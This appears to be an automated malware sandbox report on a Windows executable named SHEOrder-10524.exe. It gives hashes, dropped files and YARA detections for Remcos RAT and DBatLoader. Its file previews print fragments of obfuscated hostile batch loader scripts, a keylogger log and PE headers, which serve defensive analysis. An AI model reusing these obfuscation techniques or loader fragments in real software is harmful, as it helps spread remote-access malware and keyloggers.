                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          https://56hytuti5.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          udVh4Ist4Z.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          samradapps_datepicker_221114.xlamGet hashmaliciousUnknownBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          Enquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          Ref_Order04.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                          • 13.107.139.11

                                                                                                                          Dropped Files

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          C:\Users\Public\Libraries\easinvoker.exeudVh4Ist4Z.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                            Enquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                              URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                  fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                    FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                      HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                        payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            SecuriteInfo.com.Win32.RATX-gen.9491.24773.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                              C:\Users\Public\Libraries\lhgtogaW.pifudVh4Ist4Z.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                  ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                    RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                      20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                        disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                          82__GT7568.PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                            SecuriteInfo.com.Win32.Evo-gen.25660.20544.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.15258.6765.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                rKjlbIeOH9.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\ProgramData\remcos\logs.dat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):288
                                                                                                                                                                  Entropy (8bit):3.30006269448478
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:6l+cl55YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6ltDec0WFe5BWFe5BW+
                                                                                                                                                                  MD5:53DB1EFBBAC14204981A07486A2CB165
                                                                                                                                                                  SHA1:8332E6022E28124110236AC1B3FDFDA06E785B2E
                                                                                                                                                                  SHA-256:B0D4853127F83C67C0A33E0D6F04CA01B7A0FB1ACBE78341C6F6501D994F7C45
                                                                                                                                                                  SHA-512:D8490D603A0AD4F44814E80781FD379D6CE1161FF2F8A1D684B5968E11621F7A27CA4AC5D662F218513200EC205C78B36ED37BB6C5BB35273DCA7A4AEC4D0A48
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview:....[.2.0.2.4./.0.4./.2.4. .1.7.:.0.4.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                                                  C:\Users\Public\Libraries\KDECO.bat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3646
                                                                                                                                                                  Entropy (8bit):5.383959173452972
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                                                                                                  MD5:71E46EFE9932B83B397B44052513FB49
                                                                                                                                                                  SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                                                                                                  SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                                                                                                  SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/

                                                                                                                                                                  C:\Users\Public\Libraries\Null

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                  Entropy (8bit):2.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Mov:Mov
                                                                                                                                                                  MD5:26EB5C462A98113BC43350C1D1A3A774
                                                                                                                                                                  SHA1:EC21267B15B6E5E580EF3051084E8F373037C2F9
                                                                                                                                                                  SHA-256:4593C89B4D60161D78FEF3F48312D7833649B876A0C1D762CB5B9D73ACAA0A20
                                                                                                                                                                  SHA-512:5671CCE6F865BA2B7A2C5F493AA0BD1DA33FB70ED896A79A6702A65F66F2E997A4429C984EBC859FA7D13BE24E859B5CC54E6EBCF817CD47CBBE5A94DE876D73
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:10..

                                                                                                                                                                  C:\Users\Public\Libraries\Wagotghl.PIF

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1646592
                                                                                                                                                                  Entropy (8bit):7.465739273228309
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BPTQ+l04pEnlk8U2flxAu:NGup2B+K1mzyPTQh4psG2Z
                                                                                                                                                                  MD5:439F6DB2ADB770A0F825879C91DA9904
                                                                                                                                                                  SHA1:6B997F099E01BA06378A58115F65D515A22F5FB1
                                                                                                                                                                  SHA-256:9EEF226FDB7D6C554CD552FC3F597EBFD6D77E33B95DB53F7A631A75ACF0C270
                                                                                                                                                                  SHA-512:D3B5475EC41DF26581757656B38AE4C20367BCE638226B93C1AE2B890E0818C2CB1740FBF8B8108E244A5D5F48C78C0D0FA7FE382AA9FE321A3D696C6D5A30D3
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................p..........D.............@..............................................@........................... ..X$...........................p...`...........................`.......................&...............................text....g.......h.................. ..`.itext...............l.............. ..`.data...LK.......L...t..............@....bss....l6...............................idata..X$... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...`...p...b..................@..B.rsrc................J..............@..@..................... ..............@..@................................................................................................

                                                                                                                                                                  C:\Users\Public\Libraries\WagotghlO.bat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):30026
                                                                                                                                                                  Entropy (8bit):3.9380000056299878
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
                                                                                                                                                                  MD5:828FFBF60677999579DAFE4BF3919C63
                                                                                                                                                                  SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
                                                                                                                                                                  SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
                                                                                                                                                                  SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\WagotghlO.bat, Author: ditekSHen
                                                                                                                                                                  Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...

                                                                                                                                                                  C:\Users\Public\Libraries\easinvoker.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):131648
                                                                                                                                                                  Entropy (8bit):5.225468064273746
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                                                                                  MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                                                                  SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                                                                                  SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                                                                                  SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: udVh4Ist4Z.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Enquiry 230424.bat, Detection: malicious, Browse
                                                                                                                                                                  • Filename: URGENTE_NOTIFICATION.cmd, Detection: malicious, Browse
                                                                                                                                                                  • Filename: OKhCyJ619J.rtf, Detection: malicious, Browse
                                                                                                                                                                  • Filename: fu56fbrtn8.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Browse
                                                                                                                                                                  • Filename: HFiHWvPsvA.rtf, Detection: malicious, Browse
                                                                                                                                                                  • Filename: payment swift.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: VdwJB2cS5l.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\Public\Libraries\lhgtogaW.pif

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                  Entropy (8bit):6.328046551801531
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                  MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                  SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                  SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                  SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: udVh4Ist4Z.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Browse
                                                                                                                                                                  • Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Browse
                                                                                                                                                                  • Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Browse
                                                                                                                                                                  • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                                                                                                  • Filename: disktop.pif.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: 82__GT7568.PDF.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: rKjlbIeOH9.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                                                                  C:\Users\Public\Libraries\netutils.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):115180
                                                                                                                                                                  Entropy (8bit):5.090281411774507
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:iuuRxID3z1yUXtZKmsryc/o5jdePNtq8YCl7MbiRVRBfY+u:iuuRa/ZZK4c/UePNtq8nRBfY+u
                                                                                                                                                                  MD5:6BAAEA4D3A65281B55173738795EB02C
                                                                                                                                                                  SHA1:1FBE7EC7F5E2D1FB0AB1807E149EEE66A86F9224
                                                                                                                                                                  SHA-256:0007FA57DA2E1DE2E487492D00B99ABAECA7E9F9CAC8A10E24EB569E19F76EE1
                                                                                                                                                                  SHA-512:AF0285CF961AEAE960EDE41F195809E9B84CCB262F17F2E994DA5C599EBDF712788E5A3F2E0E2ED16E67AA888BDABFD7A6096AD8DDA2D062D2F82B010E81D5C5
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....&f.X........& ....."....................<a.............................0.......:........ ..............................................................`..(...............\........................... ...(...................................................text...p .......".................. .P`.data...P....@.......(..............@.P..rdata.......P.......*..............@.P@.pdata..(....`.......0..............@.0@.xdata.......p.......4..............@.0@.bss..................................p..edata...............6..............@.0@.idata...............8..............@.0..CRT....X............@..............@.@..tls....h............B..............@.`..reloc..\............D..............@.0B/4...................F..............@.PB/19..................J..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                                                                                                  C:\Users\Public\Wagotghl.url

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wagotghl.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):100
                                                                                                                                                                  Entropy (8bit):5.065951690356517
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMGKkNsysb9xvoTn:HRYFVmTWDyzzKkNhE9uTn
                                                                                                                                                                  MD5:2DFA2FF8E8EBFC660F029A00606EAA0D
                                                                                                                                                                  SHA1:30D99997A5AEDF0DD9980047AED5958A304FF192
                                                                                                                                                                  SHA-256:842A9E2357260F4C66F47EDCB7CCBAE5BB960464CCAE6BCC352476C11F78E4EF
                                                                                                                                                                  SHA-512:6D39CB55F1900BF948EB8ACCF22C22C54614FA54BBFBE679B0019F51971D1228CB8353FDC0FE4226F9CDF9677B5EE6B25B5BF6C3F2ACAC3A2EB50646383F2AA8
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wagotghl.PIF"..IconIndex=51..HotKey=32..

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):965
                                                                                                                                                                  Entropy (8bit):5.005233927773532
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:tkbOnd66GkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdbauKyGX85jrvXhNlT3/7sYDsro
                                                                                                                                                                  MD5:DA0FD37CC49697181AE27DA4C9D3C308
                                                                                                                                                                  SHA1:A6555517791DFFC3DFD07C3A2467A957F90AA67C
                                                                                                                                                                  SHA-256:540275576574073DDE26A8FABECB51D8A60343AE2EFE289628093D0B84430F19
                                                                                                                                                                  SHA-512:D6E3EA3E4357FB1CF120405BEF882E4667F3D80A463C3FB8866F451CA55B2A78BF7EFF9F692814AFF436EE8DFD1073A5AD66D83DD7CA27CF2F78799F72B0F58F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bhv1938.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x60d7b9e7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20447232
                                                                                                                                                                  Entropy (8bit):1.2830245920312073
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:BRSPOhijljKhBfvKDv2Q+555ckQB8WBbXnE:eii9PD7+
                                                                                                                                                                  MD5:4C336803FF8AC0C91A05DBA8CB0DF08E
                                                                                                                                                                  SHA1:6DA80AE9A13127F15EAB901DD775274A3332110E
                                                                                                                                                                  SHA-256:AF1C30F795EAAF8BC5EBBE59D2190DDDA0C77F5D7B419C387A23DB7FC8554583
                                                                                                                                                                  SHA-512:8D6907EF1B901D446D059FAB4AE3D755BE63B698F364CDB5253713F65FE20A3EF9092FD37B3D85DD43C0CB8B201D5D39E2EC93B54E00D050CE4FA59E0842E399
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:`..... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................Ji>.....{....................dv.....{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\zhrdpmieysz

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Entropy (8bit):7.465739273228309
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                  File name:SHEOrder-10524.exe
                                                                                                                                                                  File size:1'646'592 bytes
                                                                                                                                                                  MD5:439f6db2adb770a0f825879c91da9904
                                                                                                                                                                  SHA1:6b997f099e01ba06378a58115f65d515a22f5fb1
                                                                                                                                                                  SHA256:9eef226fdb7d6c554cd552fc3f597ebfd6d77e33b95db53f7a631a75acf0c270
                                                                                                                                                                  SHA512:d3b5475ec41df26581757656b38ae4c20367bce638226b93c1ae2b890e0818c2cb1740fbf8b8108e244a5d5f48c78c0d0fa7fe382aa9fe321a3d696c6d5a30d3
                                                                                                                                                                  SSDEEP:24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BPTQ+l04pEnlk8U2flxAu:NGup2B+K1mzyPTQh4psG2Z
                                                                                                                                                                  TLSH:6D75CF61A3E0D2B7F03B10FED439B55961C1F9A4281774DDB2D50B7BDA3BA83240929E
                                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:3575b4a8b0b085d1

                                                                                                                                                                  Static PE Info

                                                                                                                                                                  General

                                                                                                                                                                  Entrypoint:0x458744
                                                                                                                                                                  Entrypoint Section:.itext
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                  TLS Callbacks:
